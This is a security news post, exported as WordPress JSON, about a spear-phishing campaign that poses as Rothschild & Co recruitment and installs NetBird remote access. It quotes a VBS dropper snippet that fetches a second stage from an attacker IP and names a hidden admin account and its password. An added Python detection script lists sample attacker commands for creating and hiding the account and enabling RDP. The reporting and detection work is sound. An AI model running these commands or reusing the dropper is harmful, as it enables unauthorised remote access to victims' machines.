{"id":4274,"date":"2025-05-29T10:03:49","date_gmt":"2025-05-29T10:03:49","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/05\/29\/new-spear-phishing-attack-targeting-financial-executives-by-deploying-netbird-malware\/"},"modified":"2025-05-29T10:03:49","modified_gmt":"2025-05-29T10:03:49","slug":"new-spear-phishing-attack-targeting-financial-executives-by-deploying-netbird-malware","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/05\/29\/new-spear-phishing-attack-targeting-financial-executives-by-deploying-netbird-malware\/","title":{"rendered":"New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware"},"content":{"rendered":"<div>\n<p>A sophisticated spear-phishing campaign has emerged targeting chief financial officers and senior financial executives across banking, energy, insurance, and investment sectors worldwide, marking a concerning escalation in precision-targeted cyber attacks against corporate leadership.<\/p>\n<p>The campaign, which surfaced on May 15, 2025, employs advanced social engineering techniques disguised as legitimate recruitment opportunities from the financial firm Rothschild &amp; Co to compromise high-value targets across Europe, Africa, Canada, the Middle East, and South Asia.<\/p>\n<p>Trellix identified this multi-stage operation through its email security products, which flagged the campaign because of unusual <a href=\"https:\/\/cybersecuritynews.com\/clickfix-captcha-technique-ransomware\/\">CAPTCHA<\/a> behavior patterns and evasive URL structures.<\/p>\n<p>The attackers demonstrate a sophisticated understanding of corporate hierarchies and executive psychology, crafting personalized messages that appeal to career advancement aspirations while bypassing traditional 
security awareness training focused on generic phishing attempts.<\/p>\n<p>The attack represents a significant departure from conventional malware deployment strategies, as threat actors leverage NetBird, a legitimate WireGuard-based remote access tool, rather than traditional backdoors or trojans.<\/p>\n<p>This approach allows attackers to blend malicious activities with legitimate network management tools, complicating detection efforts and extending persistence capabilities.<\/p>\n<p>Trellix researchers <a href=\"https:\/\/www.trellix.com\/blogs\/research\/cfo-spear-phishing-netbird-attack\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">noted<\/a> that portions of the infrastructure overlap with at least one other nation-state spear-phishing campaign, though definitive attribution remains pending further investigation.<\/p>\n<p>The campaign\u2019s global reach spans multiple industries and geographic regions, with confirmed targeting of financial institutions in the United Kingdom, Canada, South Africa, Norway, South Korea, Singapore, Switzerland, France, Egypt, Saudi Arabia, and Brazil.<\/p>\n<p>The precision targeting suggests extensive <a href=\"https:\/\/cybersecuritynews.com\/morphing-meerkat-phaas-using-dns-reconnaissance\/\" target=\"_blank\" rel=\"noreferrer noopener\">reconnaissance<\/a> capabilities and access to detailed corporate organizational charts, indicating a well-resourced threat actor with strategic objectives beyond immediate financial gain.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Infection Mechanism and Multi-Stage Payload Delivery<\/strong><\/h2>\n<p>The attack chain initiates with carefully crafted emails bearing the subject line \u201cRothschild &amp; Co leadership opportunity (Confidential)\u201d sent from the address _863563754768397286998728@notarius.net.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" 
src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgBdYxIahB3ujoG36IrMmQXC527FQMj7mYENmcM1Q2BBFkiKWTQoDC-1um8pYy6RE5lDczB7788O1ByjsziOvIdk_ftkm0F0qeOvhJT1lk63HofmcAV0bwtYF5L3i1V5GMcG9UajHKL26Do-CMPsQox_0OUVw-_T6ep-nRXrqS4k-L0CAqW-VKqoQQl-Yk\/s16000\/Spear-Phishing%2520Campaign%2520Installing%2520Netbird%2520and%2520Enabling%2520Remote%2520Access%2520%28Source%2520-%2520Trellix%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Spear-Phishing Campaign Installing Netbird and Enabling Remote Access (Source \u2013 Trellix)<\/figcaption><\/figure>\n<\/div>\n<p>Recipients receive what appears to be a PDF attachment named \u201cRothschild_&amp;_Co-6745763.PDF,\u201d which actually functions as a phishing link redirecting victims to a Firebase-hosted application at hxxps:\/\/googl-6c11f.firebaseapp[.]com\/job\/file-846873865383.html.<\/p>\n<p>The intermediate page implements a custom CAPTCHA mechanism requiring users to solve simple mathematical calculations, specifically asking \u201cWhat is the result of 9 + 10?\u201d This evasion technique circumvents automated <a href=\"https:\/\/cybersecuritynews.com\/web-security-scanners\/\" target=\"_blank\" rel=\"noreferrer noopener\">security scanners<\/a> while creating a false sense of legitimacy through the mathematical verification process.<\/p>\n<p>Upon successful completion, JavaScript functions decrypt a hardcoded redirect URL, leading victims to hxxps:\/\/googl-6c11f.web[.]app\/job\/9867648797586_Scan_15052025-736574.html, where they encounter a download portal mimicking secure document delivery systems.<\/p>\n<p>The downloaded archive \u201cRothschild_&amp;_Co-6745763.zip\u201d contains an initial VBS script that establishes the infection foothold. 
This 1KB file performs several critical functions upon execution:<\/p>\n<pre class=\"wp-block-code\"><code>' Stage-one dropper: fetch the second-stage VBS, which the server hands out under a .pdf name,\n' into a staging folder on the system drive\nscriptURL = \"http:\/\/192.3.95.152\/cloudshare\/atr\/pull.pdf\"\nsavePath = \"C:\\temper\\pull.vbs\"\nSet objFSO = CreateObject(\"Scripting.FileSystemObject\")\n' Create C:\\temper if it does not already exist\nIf Not objFSO.FolderExists(\"C:\\temper\") Then\n    objFSO.CreateFolder \"C:\\temper\"\nEnd If<\/code><\/pre>\n<p>The script establishes a temporary directory structure, downloads a secondary payload disguised as a PDF file, and executes it with elevated privileges using the \u201crunas\u201d ShellExecute verb, which triggers a UAC consent prompt rather than elevating silently.<\/p>\n<p>This second-stage VBS downloader retrieves additional components from the same command and control server, including NetBird and OpenSSH MSI packages concealed within a renamed ZIP archive.<\/p>\n<p>The installation process occurs silently through msiexec commands, while the script also creates a hidden administrative account named \u201cuser\u201d with the password \u201cBs@202122\u201d and enables Remote Desktop Protocol access. That leaves the attackers with several persistent access paths into a compromised system: the NetBird overlay network, SSH, and RDP with a known local administrator credential.<\/p>\n<p><strong>
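<\/strong><\/p>\n<p>The following Python script is an added example and is not code from the article or from Trellix. It runs a small set of behavioural rules over constructed process-creation events (the hostnames, timestamps and command lines are made up, shaped like Sysmon Event ID 1 or Security 4688 records) that model the second stage described above: a script host launched from the C:\\temper staging folder, silent msiexec installs of NetBird and OpenSSH, a local account created, added to Administrators and hidden from the logon screen, and RDP switched on through fDenyTSConnections. The rule names, the three-rule threshold and the helper names SAMPLE_EVENTS, match_rules, hunt and probable_chains are choices made for this example. It goes one step beyond the page by matching any account name rather than only \u201cuser\u201d, since the name is trivially changed between campaigns; the per-host correlation is what separates this chain from an ordinary silent MSI install.<\/p>\n

```python
import ntpath
import re

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 shape), NOT real telemetry.
# They model the second-stage behaviour described in the write-up; the exact attacker command
# lines are not on the page, so these are assumed forms of the same actions.
SAMPLE_EVENTS = [
    {'ts': '2025-05-15T09:12:01Z', 'host': 'CFO-LAPTOP', 'image': 'C:\\Windows\\System32\\wscript.exe',
     'cmd': 'wscript.exe C:\\temper\\pull.vbs'},
    {'ts': '2025-05-15T09:12:40Z', 'host': 'CFO-LAPTOP', 'image': 'C:\\Windows\\System32\\msiexec.exe',
     'cmd': 'msiexec.exe /i C:\\temper\\netbird.msi /quiet /norestart'},
    {'ts': '2025-05-15T09:13:05Z', 'host': 'CFO-LAPTOP', 'image': 'C:\\Windows\\System32\\msiexec.exe',
     'cmd': 'msiexec.exe /i C:\\temper\\OpenSSH-Win64-v9.5.0.0.msi /qn'},
    {'ts': '2025-05-15T09:13:20Z', 'host': 'CFO-LAPTOP', 'image': 'C:\\Windows\\System32\\net.exe',
     'cmd': 'net user user Bs@202122 /add'},
    {'ts': '2025-05-15T09:13:21Z', 'host': 'CFO-LAPTOP', 'image': 'C:\\Windows\\System32\\net.exe',
     'cmd': 'net localgroup administrators user /add'},
    {'ts': '2025-05-15T09:13:22Z', 'host': 'CFO-LAPTOP', 'image': 'C:\\Windows\\System32\\reg.exe',
     'cmd': 'reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\"'
            ' /v user /t REG_DWORD /d 0 /f'},
    {'ts': '2025-05-15T09:13:23Z', 'host': 'CFO-LAPTOP', 'image': 'C:\\Windows\\System32\\reg.exe',
     'cmd': 'reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    # Benign noise on a second host: an ordinary silent installer and a scheduled inventory script.
    {'ts': '2025-05-15T09:14:00Z', 'host': 'HR-DESKTOP', 'image': 'C:\\Windows\\System32\\msiexec.exe',
     'cmd': 'msiexec.exe /i C:\\Users\\hr\\Downloads\\7z2406-x64.msi /qn'},
    {'ts': '2025-05-15T09:15:00Z', 'host': 'HR-DESKTOP', 'image': 'C:\\Windows\\System32\\wscript.exe',
     'cmd': 'wscript.exe C:\\ProgramData\\Corp\\inventory.vbs'},
]

# (rule name, regex on the lower-cased image basename, regex on the full command line).
# Names and thresholds are choices made for this example, not Trellix's signatures.
RULES = [
    ('script host run from C:\\temper staging folder',
     r'^(wscript|cscript)\.exe$', r'(?i)[a-z]:\\temper\\'),
    ('silent msiexec install of NetBird or OpenSSH',
     r'^msiexec\.exe$', r'(?i)/i\s+\S*(netbird|openssh)\S*\.msi\b.*(/qn|/quiet)'),
    ('local account created with net user',
     r'^net1?\.exe$', r'(?i)^net1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b'),
    ('account added to local Administrators',
     r'^net1?\.exe$', r'(?i)localgroup\s+administrators\s+\S+\s+/add\b'),
    ('account hidden from the logon screen (SpecialAccounts\\UserList = 0)',
     r'^reg\.exe$', r'(?i)SpecialAccounts\\UserList\S*\s+/v\s+\S+\s+/t\s+REG_DWORD\s+/d\s+0\b'),
    ('RDP enabled (fDenyTSConnections = 0)',
     r'^reg\.exe$', r'(?i)fDenyTSConnections\s+/t\s+REG_DWORD\s+/d\s+0\b'),
]


def match_rules(event):
    '''Names of every rule the event trips (usually zero or one).'''
    exe = ntpath.basename(event['image']).lower()
    return [name for name, exe_re, cmd_re in RULES
            if re.match(exe_re, exe) and re.search(cmd_re, event['cmd'])]


def hunt(events):
    '''Group rule hits per host: {host: {rule name: [timestamps]}}. Hosts with no hits are omitted.'''
    per_host = {}
    for ev in events:
        for name in match_rules(ev):
            per_host.setdefault(ev['host'], {}).setdefault(name, []).append(ev['ts'])
    return per_host


def probable_chains(events, min_rules=3):
    '''Hosts showing at least min_rules distinct behaviours. One silent MSI install alone is noise;
    install plus a new hidden admin plus RDP on the same host is the pattern the write-up describes.'''
    return sorted(host for host, hits in hunt(events).items() if len(hits) >= min_rules)


if __name__ == '__main__':
    flagged = probable_chains(SAMPLE_EVENTS)
    for host, hits in hunt(SAMPLE_EVENTS).items():
        print(host, '- probable chain' if host in flagged else '- isolated hit')
        for name, stamps in hits.items():
            print('   ', name, stamps)
```

<p>Run stand-alone it prints one line per host with the rules it tripped and their timestamps; the HR-DESKTOP noise produces no hits at all, while CFO-LAPTOP trips all six. In practice the event list would come from an EDR or SIEM query, and the msiexec rule is worth widening to any MSI fetched into a user-writable staging folder rather than only NetBird and OpenSSH, since the tool is interchangeable and the staging pattern is not.<\/p>\n<p><strong>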
<\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/new-spear-phishing-attack-targeting-financial-executives\/\">New Spear-Phishing Attack Targeting Financial Executives by Deploying NetBird Malware<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p>Tushar Subhra Dutta<\/p>\n","protected":false},"excerpt":{"rendered":"<p>A sophisticated spear-phishing campaign has emerged targeting chief financial officers and senior financial executives across banking, energy, insurance, and investment sectors worldwide, marking a concerning escalation in precision-targeted cyber attacks against corporate leadership. 
The campaign, which surfaced on May 15, 2025, employs advanced social engineering [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[63,124,649],"tags":[130],"class_list":["post-4274","post","type-post","status-publish","format-standard","hentry","category-cyber-security-news","category-phishing","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/4274"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=4274"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/4274\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=4274"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=4274"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=4274"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}